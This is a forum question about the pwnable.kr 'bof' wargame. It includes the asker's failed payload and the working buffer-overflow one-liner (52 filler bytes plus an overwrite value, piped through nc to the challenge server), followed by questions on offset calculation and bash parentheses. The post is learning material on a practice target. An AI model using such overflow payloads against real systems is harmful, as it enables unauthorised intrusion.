# Enclosing piped commands in parentheses *WARGAME SPOILERS*

Tags: buffer-overflow

This problem is "bof" taken from http://pwnable.kr. I was playing around with different payloads, increasing by 4 trash bytes each and searching around for ways to bypass stack smashing canaries.

This is an example payload I tried:

```
 python -c 'print "A" * 52 + "\xbe\xba\xfe\xca"'; cat - | nc pwnable.kr
```

After a few hours, I gave up and searched around.
The answer, *SPOILERS*:

```
(python -c 'print "A" * 52 + "\xbe\xba\xfe\xca"'; cat - )| nc pwnable.kr 9000
```

**1) I learned from someone that an offset for a buffer overflow can be guessed by just adding 4 bytes to the original char array length until it is found. How do you calculate offsets mathematically?**

**2) Why does adding parentheses make the bash command operate correctly where it is nearly identical to the one I tried**

Comment: This article explains my confusion: http://netsec.ws/?p=180
The buffer reads into memory and eventually eip. Do you subtract eip-(end of buffer)?

Comment: I have read https://www.offensive-security.com/metasploit-unleashed/writing-an-exploit/ and still don't understand how their "/usr/share/metasploit-framework/tools/pattern_create.rb" function works. How can the program calculate an offset when given only a singe address?